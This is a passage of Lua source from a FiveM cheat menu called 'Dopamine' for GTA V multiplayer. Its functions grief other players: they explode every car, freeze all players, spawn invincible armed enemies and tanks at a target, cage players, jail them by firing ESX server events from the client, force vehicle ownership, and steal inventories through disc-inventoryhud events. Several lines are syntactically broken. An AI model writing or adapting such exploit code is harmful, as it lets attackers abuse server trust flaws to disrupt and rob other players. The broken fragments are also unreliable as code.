- pInvoke( 0x5FBCA48327B914DF, blip, false)
- end
- elseif vehModel == GetHashKey('trash') or vehModel == GetHashKey('trash2') then
- if blipSprite ~= 318 then
- SetBlipSprite(blip, 318)
- pInvoke( 0x5FBCA48327B914DF, blip, true)
- end
- elseif vehModel == GetHashKey('pbus') then
- if blipSprite ~= 513 then
- SetBlipSprite(blip, 513)
- pInvoke( 0x5FBCA48327B914DF, blip, false)
- end
- elseif vehModel == GetHashKey('seashark') or vehModel == GetHashKey('seashark2') or vehModel == GetHashKey('seashark3') then
- if blipSprite ~= 471 then
- SetBlipSprite(blip, 471)
- pInvoke( 0x5FBCA48327B914DF, blip, false)
- end
- elseif vehModel == GetHashKey('cargobob') or vehModel == GetHashKey('cargobob2') or vehModel == GetHashKey('cargobob3') or vehModel == GetHashKey('cargobob4') then
- if blipSprite ~= 481 then
- SetBlipSprite(blip, 481)
- pInvoke( 0x5FBCA48327B914DF, blip, false)
- end
- elseif vehModel == GetHashKey('technical') or vehModel == GetHashKey('technical2') or vehModel == GetHashKey('technical3') then
- if blipSprite ~= 426 then
- SetBlipSprite(blip, 426)
- pInvoke( 0x5FBCA48327B914DF, blip, false)
- end
- elseif vehModel == GetHashKey('taxi') then
- if blipSprite ~= 198 then
- SetBlipSprite(blip, 198)
- pInvoke( 0x5FBCA48327B914DF, blip, true)
- end
- elseif vehModel == GetHashKey('fbi') or vehModel == GetHashKey('fbi2') or vehModel == GetHashKey('police2') or vehModel == GetHashKey('police3')
- or vehModel == GetHashKey('police') or vehModel == GetHashKey('sheriff2') or vehModel == GetHashKey('sheriff')
- or vehModel == GetHashKey('policeold2') then
- if blipSprite ~= 56 then
- SetBlipSprite(blip, 56)
- pInvoke( 0x5FBCA48327B914DF, blip, true)
- end
- elseif blipSprite ~= 1 then
- SetBlipSprite(blip, 1)
- pInvoke( 0x5FBCA48327B914DF, blip, true)
- end
- local passengers = GetVehicleNumberOfPassengers(veh)
- if passengers > 0 then
- if not IsVehicleSeatFree(veh, -1) then
- passengers = passengers + 1
- end
- ShowNumberOnBlip(blip, passengers)
- else
- HideNumberOnBlip(blip)
- end
- else
- HideNumberOnBlip(blip)
- if blipSprite ~= 1 then
- SetBlipSprite(blip, 1)
- pInvoke( 0x5FBCA48327B914DF, blip, true)
- end
- end
- SetBlipRotation(blip, math.ceil(GetEntityHeading(veh)))
- SetBlipNameToPlayerName(blip, id)
- SetBlipScale(blip, 0.85)
- if IsPauseMenuActive() then
- SetBlipAlpha( blip, 255 )
- else
- x1, y1 = table.unpack(GetEntityCoords(Dopamine.datastore.pLocalPlayer.pedId, true))
- x2, y2 = table.unpack(GetEntityCoords(GetPlayerPed(id), true))
- distance = (math.floor(math.abs(math.sqrt((x1 - x2) * (x1 - x2) + (y1 - y2) * (y1 - y2))) / -1)) + 900
- if distance < 0 then
- distance = 0
- elseif distance > 255 then
- distance = 255
- end
- SetBlipAlpha(blip, distance)
- end
- end
- end
- end
- elseif not Dopamine.storedControls.visPlayerBlips then
- local plist = Dopamine.natives.getActivePlayers()
- for i = 1, #plist do
- local id = plist[i]
- local ped = GetPlayerPed(id)
- local blip = GetBlipFromEntity(ped)
- if DoesBlipExist(blip) then
- RemoveBlip(blip)
- end
- end
- end
- end
- --[[allPlayersOptions]]
- Dopamine.functions.aPO = {}
- Dopamine.functions.aPO.freezeAll = function()
- for i=0, #Dopamine.natives.getActivePlayers() do
- Dopamine.natives.clearPedTasksImmediately(GetPlayerPed(i))
- ClearPedSecondaryTask(GetPlayerPed(i))
- end
- end
- Dopamine.functions.aPO.disableDrivingCars = function()
- local plist = Dopamine.natives.getActivePlayers()
- for i = 0, #plist do
- if IsPedInAnyVehicle(GetPlayerPed(i), true) then
- Dopamine.natives.clearPedTasksImmediately(GetPlayerPed(i))
- end
- end
- end
- Dopamine.functions.aPO.noisyVehicles = function()
- for k in Dopamine.trashFunctions.enumVehicles() do
- SetVehicleAlarmTimeLeft(k, 60)
- end
- end
- Dopamine.functions.aPO.explodeCars = function()
- for vehicle in Dopamine.trashFunctions.enumVehicles() do
- if (vehicle ~= GetVehiclePedIsIn(GetPlayerPed(-1), false)) and (not GotTrailer or (GotTrailer and vehicle ~= TrailerHandle)) then
- Dopamine.trashFunctions.reqControlOnce(vehicle)
- Dopamine.natives.networkExplodeVehicle(vehicle, true, true, false)
- end
- end
- end
- Dopamine.functions.aPO.rapeVehicles = function()
- for enumeratedVs in Dopamine.trashFunctions.enumVehicles() do
- Dopamine.functions.sPO.rapeVehicle(enumeratedVs)
- end
- end
- Dopamine.functions.aPO.clonePeds = function()
- local plist = Dopamine.natives.getActivePlayers()
- for i = 0, #plist do
- local Handle = GetPlayerPedScriptIndex(GetPlayerPed(i))
- --[[local Handle = GetPlayerPedScriptIndex(plist[i])]]
- ClonePed(Handle, 1, 1, 1)
- end
- end
- Dopamine.functions.aPO.spawnTrollProp = function(prop)
- local plist = Dopamine.natives.getActivePlayers()
- for i = 0, #plist do
- Dopamine.functions.sPO.spawnTrollProp(GetPlayerPed(i), prop)
- end
- end
- Dopamine.functions.aPO.giveAllWeapons = function(asPickup)
- for i = 0, #Dopamine.natives.getActivePlayers() do
- Dopamine.functions.sPO.giveAllWeapons(asPickup, GetPlayerPed(i))
- end
- end
- Dopamine.functions.aPO.burnSFX = function()
- for trash=0, 50 do
- for i in Dopamine.trashFunctions.enumPeds() do
- if not IsPedAPlayer(i) then
- RequestNamedPtfxAsset('core')
- UseParticleFxAssetNextCall('core')
- StartNetworkedParticleFxNonLoopedOnEntity('ent_sht_flame', i, 0.0, 0.0, -0.5, 0.0, 0.0, 0.0, 15.0, false, false, false)
- end
- end
- end
- end
- Dopamine.functions.aPO.flyingCars = function()
- for k in Dopamine.trashFunctions.enumVehicles() do
- Dopamine.trashFunctions.reqControlOnce(k)
- ApplyForceToEntity(k, 3, 0.0, 0.0, 500.0, 0.0, 0.0, 0.0, 0, 0, 1, 1, 0, 1)
- end
- end
- Dopamine.functions.aPO.jail = function()
- for i = 0, #Dopamine.natives.getActivePlayers() do
- Dopamine.functions.sPO.jailTheFucker(GetPlayerServerId(i), 5391)
- end
- end
- Dopamine.functions.aPO.unJail = function()
- for i = 0, #Dopamine.natives.getActivePlayers() do
- Dopamine.functions.sPO.unJailTheFucker(GetPlayerServerId(i), 5391)
- end
- end
- Dopamine.functions.aPO.communityService = function()
- for i = 0, #Dopamine.natives.getActivePlayers() do
- Dopamine.functions.sPO.communityService(GetPlayerServerId(i))
- end
- end
- Dopamine.functions.aPO.propBlock = function(index)
- pCreateThread(function()
- local e8 = -145066854
- RequestModel(e8)
- while not HasModelLoaded(e8) do
- pWait(0)
- end
- if Dopamine.menuTables.trollsPropBlock.selected == 1 then
- local e9 = Dopamine.natives.createObject(e8, 97.8, -993.22, 28.41, true, true, false)
- local ea = Dopamine.natives.createObject(e8, 247.08, -1027.62, 28.26, true, true, false)
- local e92 = Dopamine.natives.createObject(e8, 274.51, -833.73, 28.25, true, true, false)
- local ea2 = Dopamine.natives.createObject(e8, 291.54, -939.83, 27.41, true, true, false)
- local ea3 = Dopamine.natives.createObject(e8, 143.88, -830.49, 30.17, true, true, false)
- local ea4 = Dopamine.natives.createObject(e8, 161.97, -768.79, 29.08, true, true, false)
- local ea5 = Dopamine.natives.createObject(e8, 151.56, -1061.72, 28.21, true, true, false)
- SetEntityHeading(e9, 39.79)
- SetEntityHeading(ea, 128.62)
- SetEntityHeading(e92, 212.1)
- SetEntityHeading(ea2, 179.22)
- SetEntityHeading(ea3, 292.37)
- SetEntityHeading(ea4, 238.46)
- SetEntityHeading(ea5, 61.43)
- FreezeEntityPosition(e9, true)
- FreezeEntityPosition(ea, true)
- FreezeEntityPosition(e92, true)
- FreezeEntityPosition(ea2, true)
- FreezeEntityPosition(ea3, true)
- FreezeEntityPosition(ea4, true)
- FreezeEntityPosition(ea5, true)
- elseif Dopamine.menuTables.trollsPropBlock.selected == 2 then
- local pd1 = Dopamine.natives.createObject(e8, 439.43, -965.49, 27.05, true, true, false)
- local pd2 = Dopamine.natives.createObject(e8, 401.04, -1015.15, 27.42, true, true, false)
- local pd3 = Dopamine.natives.createObject(e8, 490.22, -1027.29, 26.18, true, true, false)
- local pd4 = Dopamine.natives.createObject(e8, 491.36, -925.55, 24.48, true, true, false)
- SetEntityHeading(pd1, 130.75)
- SetEntityHeading(pd2, 212.63)
- SetEntityHeading(pd3, 340.06)
- SetEntityHeading(pd4, 209.57)
- FreezeEntityPosition(pd1, true)
- FreezeEntityPosition(pd2, true)
- FreezeEntityPosition(pd3, true)
- FreezeEntityPosition(pd4, true)
- elseif Dopamine.menuTables.trollsPropBlock.selected == 3 then
- local cd1 = Dopamine.natives.createObject(e8, -50.97, -1066.92, 26.52, true, true, false)
- local cd2 = Dopamine.natives.createObject(e8, -63.86, -1099.05, 25.26, true, true, false)
- local cd3 = Dopamine.natives.createObject(e8, -44.13, -1129.49, 25.07, true, true, false)
- SetEntityHeading(cd1, 160.59)
- SetEntityHeading(cd2, 216.98)
- SetEntityHeading(cd3, 291.74)
- FreezeEntityPosition(cd1, true)
- FreezeEntityPosition(cd2, true)
- FreezeEntityPosition(cd3, true)
- end
- end)
- end
- --[[selectedPlayerOptions]]
- Dopamine.functions.sPO = {}
- Dopamine.functions.sPO.spectatePlayer = function(target)
- Dopamine.storedControls.sPOIsSpectating = not Dopamine.storedControls.sPOIsSpectating
- local targetPed = GetPlayerPed(target)
- if Dopamine.storedControls.sPOIsSpectating then
- local targetx, targety, targetz = table.unpack(GetEntityCoords(targetPed, false))
- RequestCollisionAtCoord(targetx, targety, targetz)
- NetworkSetInSpectatorMode(true, targetPed)
- RequestCollisionAtCoord(GetEntityCoords(targetPed))
- NetworkSetInSpectatorMode(true, targetPed)
-'Started spectating ~b~' .. GetPlayerName(target))
- else
- local targetx, targety, targetz = table.unpack(GetEntityCoords(targetPed, false))
- RequestCollisionAtCoord(targetx, targety, targetz)
- NetworkSetInSpectatorMode(false, targetPed)
-'Stopped spectating ~b~' .. GetPlayerName(target))
- end
- end
- Dopamine.functions.sPO.teleportToPlayer = function(target)
- local x, y, z = table.unpack(GetEntityCoords(GetPlayerPed(target)))
- Dopamine.functions.teleportSelf(x, y, z)
- end
- Dopamine.functions.sPO.teleportIntoVehicle = function(target)
- if not IsPedInAnyVehicle(target) then
- return Dopamine.pushNotification('Player must be sitting in a vehicle!', 5000)
- end
- local vehicle = GetVehiclePedIsUsing(target)
- local seats = GetVehicleMaxNumberOfPassengers(vehicle)
- for i = 0, seats do
- if IsVehicleSeatFree(vehicle, i) then
- SetPedIntoVehicle(Dopamine.datastore.pLocalPlayer.pedId, vehicle, i)
- break
- end
- end
- end
- Dopamine.functions.sPO.SpawnVehicleToPlayer = function(modelName, playerIdx)
- if modelName and IsModelValid(modelName) and IsModelAVehicle(modelName) then
- RequestModel(modelName)
- while not HasModelLoaded(modelName) do pWait(0) end
- local model = (type(modelName) == 'number' and modelName or GetHashKey(modelName))
- local playerPed = GetPlayerPed(playerIdx)
- local SpawnedVehicle = Dopamine.natives.createVehicle(model, GetEntityCoords(playerPed), GetEntityHeading(playerPed), true, true)
- local SpawnedVehicleIdx = NetworkGetNetworkIdFromEntity(SpawnedVehicle)
- SetNetworkIdCanMigrate(SpawnedVehicleIdx, true)
- SetEntityAsMissionEntity(SpawnedVehicle, true, false)
- SetVehicleHasBeenOwnedByPlayer(SpawnedVehicle, true)
- SetVehicleNeedsToBeHotwired(SpawnedVehicle, false)
- SetModelAsNoLongerNeeded(model)
- if NetworkHasControlOfEntity(playerPed) then
- SetPedIntoVehicle(playerPed, SpawnedVehicle, -1)
- end
- SetVehicleEngineOn(SpawnedVehicle, true, false, false)
- SetVehRadioStation(SpawnedVehicle, 'OFF')
- return SpawnedVehicle
- else
- Dopamine.pushNotification('Invalid Vehicle Model!', 5000)
- return nil
- end
- end
- Dopamine.functions.sPO.SpawnLegalVehicle = function(vehicalModelName, playerIdx, plateNumber)
- local SpawnedVehicle = Dopamine.functions.sPO.SpawnVehicleToPlayer(vehicalModelName, playerIdx)
- if SpawnedVehicle ~= nil then
- if then
- SetVehicleNumberPlateText(SpawnedVehicle, GetVehicleNumberPlateText(SpawnedVehicle))
- else
- SetVehicleNumberPlateText(SpawnedVehicle, plateNumber) end
- Dopamine.pushNotification('Spawned Vehicle', 5000)
- local SpawnedVehicleProperties =
- local SpawnedVehicleModel = GetDisplayNameFromVehicleModel(SpawnedVehicleProperties.model)
- if SpawnedVehicleProperties then
- if Dopamine.functions.doesResourceExist('esx_vehicleshop') then
- Dopamine.dTCE(true, true, 'esx_vehicleshop:setVehicleOwnedPlayerId', GetPlayerServerId(playerIdx), SpawnedVehicleProperties, SpawnedVehicleModel, vehicalModelName, false)
- elseif Dopamine.functions.doesResourceExist('esx_CryptosCustoms') then
- Dopamine.dTCE(true, true, 'esx_CryptosCustoms:setVehicleOwnedPlayerId', GetPlayerServerId(playerIdx), SpawnedVehicleProperties, SpawnedVehicleModel, vehicalModelName, false)
- else
- Dopamine.pushNotification('Resource was not found!', 5000)
- end
- end
- end
- end
- Dopamine.functions.sPO.ESXSellVehicle = function()
- if IsPedInAnyVehicle(GetPlayerPed(-1)) then
- if Dopamine.datastore.ESX ~= nil then
- local vehicleProperties =, false))
- if Dopamine.functions.doesResourceExist('esx_vehicleshop') then
- Dopamine.datastore.ESX.TriggerServerCallback('esx_vehicleshop:resellVehicle', function(vehicle_sold) end, vehicleProperties.plate, vehicleProperties.model)
- elseif Dopamine.functions.doesResourceExist('esx_CryptosCustoms') then
- Dopamine.datastore.ESX.TriggerServerCallback('esx_CryptosCustoms:resellVehicle', function(vehicle_sold) end, vehicleProperties.plate, vehicleProperties.model)
- else
- Dopamine.pushNotification('Resource was not found!', 5000)
- end
- else
- Dopamine.pushNotification('Could not find ESX, try refresing it in the settings tab', 5000)
- end
- else
- Dopamine.pushNotification('You must be in a vehicle to use this!', 5000)
- end
- end
- Dopamine.functions.sPO.cloneVehicle = function(target)
- local selectedPlayerVehicle = nil
- if IsPedInAnyVehicle(GetPlayerPed(target)) then selectedPlayerVehicle = GetVehiclePedIsIn(GetPlayerPed(target), false)
- else selectedPlayerVehicle = GetVehiclePedIsIn(GetPlayerPed(target), true) end
- if DoesEntityExist(selectedPlayerVehicle) then
- local vehicleModel = GetEntityModel(selectedPlayerVehicle)
- local spawnedVehicle = Dopamine.functions.sPO.SpawnVehicleToPlayer(vehicleModel, PlayerId())
- local vehicleProperties =
- vehicleProperties.plate = nil
-, vehicleProperties)
- SetVehicleEngineOn(spawnedVehicle, true, false, false)
- SetVehRadioStation(spawnedVehicle, 'OFF')
- end
- end
- Dopamine.functions.sPO.clonePedOutfit = function(me, ped)
- hat = GetPedPropIndex(ped, 0)
- hat_texture = GetPedPropTextureIndex(ped, 0)
- glasses = GetPedPropIndex(ped, 1)
- glasses_texture = GetPedPropTextureIndex(ped, 1)
- ear = GetPedPropIndex(ped, 2)
- ear_texture = GetPedPropTextureIndex(ped, 2)
- watch = GetPedPropIndex(ped, 6)
- watch_texture = GetPedPropTextureIndex(ped, 6)
- wrist = GetPedPropIndex(ped, 7)
- wrist_texture = GetPedPropTextureIndex(ped, 7)
- head_drawable = GetPedDrawableVariation(ped, 0)
- head_palette = GetPedPaletteVariation(ped, 0)
- head_texture = GetPedTextureVariation(ped, 0)
- beard_drawable = GetPedDrawableVariation(ped, 1)
- beard_palette = GetPedPaletteVariation(ped, 1)
- beard_texture = GetPedTextureVariation(ped, 1)
- hair_drawable = GetPedDrawableVariation(ped, 2)
- hair_palette = GetPedPaletteVariation(ped, 2)
- hair_texture = GetPedTextureVariation(ped, 2)
- torso_drawable = GetPedDrawableVariation(ped, 3)
- torso_palette = GetPedPaletteVariation(ped, 3)
- torso_texture = GetPedTextureVariation(ped, 3)
- legs_drawable = GetPedDrawableVariation(ped, 4)
- legs_palette = GetPedPaletteVariation(ped, 4)
- legs_texture = GetPedTextureVariation(ped, 4)
- hands_drawable = GetPedDrawableVariation(ped, 5)
- hands_palette = GetPedPaletteVariation(ped, 5)
- hands_texture = GetPedTextureVariation(ped, 5)
- foot_drawable = GetPedDrawableVariation(ped, 6)
- foot_palette = GetPedPaletteVariation(ped, 6)
- foot_texture = GetPedTextureVariation(ped, 6)
- acc1_drawable = GetPedDrawableVariation(ped, 7)
- acc1_palette = GetPedPaletteVariation(ped, 7)
- acc1_texture = GetPedTextureVariation(ped, 7)
- acc2_drawable = GetPedDrawableVariation(ped, 8)
- acc2_palette = GetPedPaletteVariation(ped, 8)
- acc2_texture = GetPedTextureVariation(ped, 8)
- acc3_drawable = GetPedDrawableVariation(ped, 9)
- acc3_palette = GetPedPaletteVariation(ped, 9)
- acc3_texture = GetPedTextureVariation(ped, 9)
- mask_drawable = GetPedDrawableVariation(ped, 10)
- mask_palette = GetPedPaletteVariation(ped, 10)
- mask_texture = GetPedTextureVariation(ped, 10)
- aux_drawable = GetPedDrawableVariation(ped, 11)
- aux_palette = GetPedPaletteVariation(ped, 11)
- aux_texture = GetPedTextureVariation(ped, 11)
- SetPedPropIndex(me, 0, hat, hat_texture, 1)
- SetPedPropIndex(me, 1, glasses, glasses_texture, 1)
- SetPedPropIndex(me, 2, ear, ear_texture, 1)
- SetPedPropIndex(me, 6, watch, watch_texture, 1)
- SetPedPropIndex(me, 7, wrist, wrist_texture, 1)
- SetPedComponentVariation(me, 0, head_drawable, head_texture, head_palette)
- SetPedComponentVariation(me, 1, beard_drawable, beard_texture, beard_palette)
- SetPedComponentVariation(me, 2, hair_drawable, hair_texture, hair_palette)
- SetPedComponentVariation(me, 3, torso_drawable, torso_texture, torso_palette)
- SetPedComponentVariation(me, 4, legs_drawable, legs_texture, legs_palette)
- SetPedComponentVariation(me, 5, hands_drawable, hands_texture, hands_palette)
- SetPedComponentVariation(me, 6, foot_drawable, foot_texture, foot_palette)
- SetPedComponentVariation(me, 7, acc1_drawable, acc1_texture, acc1_palette)
- SetPedComponentVariation(me, 8, acc2_drawable, acc2_texture, acc2_palette)
- SetPedComponentVariation(me, 9, acc3_drawable, acc3_texture, acc3_palette)
- SetPedComponentVariation(me, 10, mask_drawable, mask_texture, mask_palette)
- SetPedComponentVariation(me, 11, aux_drawable, aux_texture, aux_palette)
- end
- Dopamine.functions.sPO.spawnEnemies = function(target, model)
- for i = 1, 5 do
- pCreateThread(function()
- local coords = GetEntityCoords(target)
- RequestModel(GetHashKey(model))
- pWait(50)
- if HasModelLoaded(GetHashKey(model)) then
- local ped = CreatePed(21, GetHashKey(model),coords.x + i, coords.y - i, coords.z, 0, true, true) and CreatePed(21, GetHashKey(model),coords.x - i, coords.y + i, coords.z, 0, true, true)
- NetworkRegisterEntityAsNetworked(ped)
- SetPedRelationshipGroupHash(ped, GetHashKey('AMBIENT_GANG_WEICHENG'))
- SetPedRelationshipGroupDefaultHash(ped, GetHashKey('AMBIENT_GANG_WEICHENG'))
- if DoesEntityExist(ped) and not IsEntityDead(target) then
- local netped = PedToNet(ped)
- NetworkSetNetworkIdDynamic(netped, false)
- SetNetworkIdCanMigrate(netped, true)
- SetNetworkIdExistsOnAllMachines(netped, true)
- pWait(100)
- NetToPed(netped)
- Dopamine.natives.giveWeaponToPed(ped, GetHashKey(wep), 9999, 1, 1)
- SetEntityInvincible(ped, true)
- SetPedCanSwitchWeapon(ped, true)
- TaskCombatPed(ped, target, 0,16)
- elseif IsEntityDead(target) then
- TaskCombatHatedTargetsInArea(ped, coords.x,coords.y, coords.z, 500)
- else
- pWait(0)
- end
- end
- end)
- end
- end
- Dopamine.functions.sPO.spawnHeliEnemies = function(target)
- pCreateThread(function()
- local x, y, z = table.unpack(GetEntityCoords(target))
- local flacko_veri_cool = 'buzzard'
- local nertigel_flighter = 'ig_claypain'
- RequestModel(flacko_veri_cool)
- RequestModel(nertigel_flighter)
- local timeout = 0
- while not HasModelLoaded(nertigel_flighter) do
- timeout = timeout + 100
- pWait(100)
- if timeout > 5000 then
- Dopamine.pushNotification('Could not load model!', 5000)
- break
- end
- end
- while not HasModelLoaded(flacko_veri_cool) do
- timeout = timeout + 100
- pWait(100)
- if timeout > 5000 then
- Dopamine.pushNotification('Could not load model!', 5000)
- break
- end
- end
- local flacko_dream_heli = Dopamine.natives.createVehicle(GetHashKey(flacko_veri_cool),x,y,z + 100, GetEntityHeading(target), true, true)
- local newDriver = CreatePedInsideVehicle(flacko_dream_heli, 4, nertigel_flighter, -1, true, false)
- SetHeliBladesFullSpeed(flacko_dream_heli)
- SetCurrentPedVehicleWeapon(newDriver, GetHashKey('VEHICLE_WEAPON_PLANE_ROCKET'))
- SetVehicleShootAtTarget(newDriver, target, x, y, z)
- local netped = PedToNet(newDriver)
- NetworkSetNetworkIdDynamic(netped, false)
- SetNetworkIdCanMigrate(netped, true)
- SetNetworkIdExistsOnAllMachines(netped, true)
- pWait(30)
- NetToPed(netped)
- SetEntityInvincible(netped, true)
- SetPedCanSwitchWeapon(newDriver, true)
- TaskCombatPed(newDriver, target, 0, 16)
- local model = 'a_m_y_skater_01'
- for i = 1, 3 do
- local coords = GetEntityCoords(target)
- RequestModel(GetHashKey(model))
- pWait(50)
- if HasModelLoaded(GetHashKey(model)) then
- local ped = CreatePedInsideVehicle(flacko_dream_heli, 4, nertigel_flighter, i, true, false)
- NetworkRegisterEntityAsNetworked(ped)
- pCreateThread(function()
- if DoesEntityExist(ped) and not IsEntityDead(target) then
- local netped = PedToNet(ped)
- NetworkSetNetworkIdDynamic(netped, false)
- SetNetworkIdCanMigrate(netped, true)
- SetNetworkIdExistsOnAllMachines(netped, true)
- pWait(100)
- NetToPed(netped)
- Dopamine.natives.giveWeaponToPed(ped, GetHashKey(wep), 9999, 1, 1)
- SetEntityInvincible(ped, true)
- SetPedCanSwitchWeapon(ped, true)
- TaskCombatPed(ped, target, 0,16)
- else
- pWait(0)
- end
- end)
- end
- end
- end)
- end
- Dopamine.functions.sPO.spawnTankEnemy = function(target)
- pCreateThread(function()
- local theTank = 'rhino'
- RequestModel(theTank)
- while not HasModelLoaded(theTank) do
- pWait(50)
- end
- local lVehicle = GetVehiclePedIsIn(target, false)
- local x,y,z = table.unpack(GetEntityCoords(target))
- local tank = Dopamine.natives.createVehicle(GetHashKey(theTank), x + 20,y + 20,z + 5,GetEntityCoords(target),true,false)
- Dopamine.trashFunctions.reqControlOnce(tank)
- local pPed = 's_m_y_swat_01'
- RequestModel(pPed)
- while not HasModelLoaded(pPed) do
- RequestModel(pPed)
- pWait(50)
- end
- local NerdTigel = CreatePedInsideVehicle(tank, 4, GetEntityModel(Dopamine.datastore.pLocalPlayer.pedId), -1, true, false)
- Dopamine.trashFunctions.reqControlOnce(NerdTigel)
- SetDriverAbility(NerdTigel, 10.0)
- SetDriverAggressiveness(NerdTigel, 10.0)
- TaskCombatPed(NerdTigel, target, 0, 16)
- end)
- end
- Dopamine.functions.sPO.cagePlayer = function(target)
- local x, y, z = table.unpack(GetEntityCoords(target))
- local propHash = GetHashKey('prop_doghouse_01')
- RequestModel(propHash)
- pCreateThread(function()
- local timeout = 0
- while not HasModelLoaded(propHash) do
- timeout = timeout + 100
- pWait(100)
- if timeout > 5000 then
- Dopamine.pushNotification('Could not load model!', 5000)
- break
- end
- end
- Dopamine.natives.clearPedTasksImmediately(target)
- local cageObj = Dopamine.natives.createObject(propHash, x, y, z, true, true, false)
- SetEntityHeading(cageObj, 0.0)
- FreezeEntityPosition(cageObj, true)
- end)
- end
- Dopamine.functions.sPO.giveAllWeapons = function(asPickup, target)
- for i = 1, #Dopamine.trashTables.weaponsModels do
- if asPickup then
- CreatePickup(GetHashKey('PICKUP_'..Dopamine.trashTables.weaponsModels[i]), GetEntityCoords(target))
- else
- Dopamine.natives.giveWeaponToPed(target, GetHashKey(Dopamine.trashTables.weaponsModels[i]), 250, false, false)
- end
- end
- end
- Dopamine.functions.sPO.ramVehicle = function(target, m_vehicle)
- pCreateThread(function()
- local model = GetHashKey(m_vehicle)
- RequestModel(model)
- while not HasModelLoaded(model) do
- pWait(0)
- end
- local offset = GetOffsetFromEntityInWorldCoords(target, 0, -10.0, 0)
- if HasModelLoaded(model) then
- local veh = Dopamine.natives.createVehicle(model, offset.x, offset.y, offset.z, GetEntityHeading(target), true, true)
- NetworkRegisterEntityAsNetworked(VehToNet(veh))
- SetVehicleForwardSpeed(veh, 60.0)
- end
- end)
- end
- Dopamine.functions.sPO.spawnTrollProp = function(target, prop)
- local propHash = GetHashKey(prop)
- RequestModel(propHash)
- pCreateThread(function()
- local timeout = 0
- while not HasModelLoaded(propHash) do
- timeout = timeout + 100
- pWait(100)
- if timeout > 5000 then
- Dopamine.pushNotification('Could not load model!', 5000)
- break
- end
- end
- local x,y,z = table.unpack(GetEntityCoords(target))
- local object = Dopamine.natives.createObject(propHash, x, y, z, true, true, false)
- AttachEntityToEntity(object, target, GetPedBoneIndex(target, SKEL_Spine_Root), 0.0, 0.0, 0.0, 0.0, 90.0, 0, false, false, false, false, 2, true)
- --[[SetModelAsNoLongerNeeded(propHash)]]
- end)
- end
- Dopamine.functions.sPO.shootAt = function(target, weaponName)
- if IsPedInAnyVehicle(target, true) then
- Dopamine.natives.clearPedTasksImmediately(target)
- end
- local destination = GetPedBoneCoords(target, SKEL_ROOT, 0.0, 0.0, 0.0)
- local origin = GetPedBoneCoords(target, SKEL_R_Hand, 0.0, 0.0, 0.2)
- local weaponHash = GetHashKey(weaponName)
- Dopamine.natives.shootSingleBulletBetweenCoords(origin.x, origin.y, origin.z, destination.x, destination.y, destination.z, 1, 0, weaponHash, Dopamine.datastore.pLocalPlayer.pedId, false, false, 1)
- end
- Dopamine.functions.sPO.rapeVehicle = function(vehicle)
- if not IsPedAPlayer(GetPedInVehicleSeat(vehicle, -1)) then
- Dopamine.trashFunctions.reqControlOnce(vehicle)
- if NetworkHasControlOfEntity(vehicle) then
- SetEntityAsMissionEntity(vehicle, false, false)
- StartVehicleAlarm(vehicle)
- DetachVehicleWindscreen(vehicle)
- SmashVehicleWindow(vehicle, 0)
- SmashVehicleWindow(vehicle, 1)
- SmashVehicleWindow(vehicle, 2)
- SmashVehicleWindow(vehicle, 3)
- SetVehicleTyreBurst(vehicle, 0, true, 1000.0)
- SetVehicleTyreBurst(vehicle, 1, true, 1000.0)
- SetVehicleTyreBurst(vehicle, 2, true, 1000.0)
- SetVehicleTyreBurst(vehicle, 3, true, 1000.0)
- SetVehicleTyreBurst(vehicle, 4, true, 1000.0)
- SetVehicleTyreBurst(vehicle, 5, true, 1000.0)
- SetVehicleTyreBurst(vehicle, 4, true, 1000.0)
- SetVehicleTyreBurst(vehicle, 7, true, 1000.0)
- SetVehicleDoorBroken(vehicle, 0, true)
- SetVehicleDoorBroken(vehicle, 1, true)
- SetVehicleDoorBroken(vehicle, 2, true)
- SetVehicleDoorBroken(vehicle, 3, true)
- SetVehicleDoorBroken(vehicle, 4, true)
- SetVehicleDoorBroken(vehicle, 5, true)
- SetVehicleDoorBroken(vehicle, 6, true)
- SetVehicleDoorBroken(vehicle, 7, true)
- SetVehicleLights(vehicle, 1)
- SetVehicleLightsMode(vehicle, 1)
- SetVehicleNumberPlateTextIndex(vehicle, 5)
- SetVehicleNumberPlateText(vehicle, 'd'..'opamine')
- SetVehicleDirtLevel(vehicle, 10.0)
- SetVehicleModColor_1(vehicle, 1)
- SetVehicleModColor_2(vehicle, 1)
- SetVehicleCustomPrimaryColour(vehicle, 255, 51, 255)
- SetVehicleCustomSecondaryColour(vehicle, 255, 51, 255)
- SetVehicleBurnout(vehicle, true)
- ForceVehicleEngineAudio(vehicle, 'faggio')
- SetVehicleLightsMode(vehicle, 1)
- SetVehicleHandlingFloat(vehicle, 'CHandlingData', 'fDriveBiasFront', 0.9)
- SetVehicleSteerBias(vehicle, 1.0)
- end
- end
- end
- Dopamine.functions.sPO.SearchDisc = function(player)
- local discSecondarySearchInventory = {
- type = 'player',
- owner = '',
- seize = true
- }
- if Dopamine.datastore.ESX ~= nil then
- Dopamine.datastore.ESX.TriggerServerCallback('disc-inventoryhud:getIdentifier', function(identifier)
- discSecondarySearchInventory.owner = identifier
- Dopamine.dTCE(false, false, 'disc-inventoryhud:openInventory', discSecondarySearchInventory)
- end, player)
- else
- Dopamine.pushNotification('Could not find ESX, try refresing it in the settings tab', 5000)
- end
- end
- Dopamine.functions.sPO.StealDisc = function(player)
- local discSecondaryStealInventory = {
- type = 'player',
- owner = '',
- steal = true
- }
- if Dopamine.datastore.ESX ~= nil then
- Dopamine.datastore.ESX.TriggerServerCallback('disc-inventoryhud:getIdentifier', function(identifier)
- discSecondaryStealInventory.owner = identifier
- Dopamine.dTCE(false, false, 'disc-inventoryhud:openInventory', discSecondaryStealInventory)
- end, player)
- else
- Dopamine.pushNotification('Could not find ESX, try refresing it in the settings tab', 5000)
- end
- end
- Dopamine.functions.sPO.jailTheFucker = function(target, time)
- if Dopamine.functions.doesResourceExist('esx-qalle-jail') or Dopamine.functions.doesResourceExist('esx_qalle_jail') then
- Dopamine.dTCE(false, true, 'esx-qalle-jail:jailPlayer', target, time, 'www.d0pamine')
- elseif Dopamine.functions.doesResourceExist('esx_jailer') then
- Dopamine.dTCE(false, true, 'esx_jailler:sendToJail', target, time, 'www.d0pamine', time)
- Dopamine.dTCE(false, true, 'esx_jailer:sendToJail', target, time, 'www.d0pamine', time)
- elseif Dopamine.functions.doesResourceExist('esx_jail') then
- Dopamine.dTCE(false, true, 'esx_jail:sendToJail', target, time, 'www.d0pamine')
- else
- Dopamine.pushNotification('Resource was not found!', 5000)
- end
- end
- Dopamine.functions.sPO.unJailTheFucker = function(target)
- if Dopamine.functions.doesResourceExist('esx-qalle-jail') or Dopamine.functions.doesResourceExist('esx_qalle_jail') then
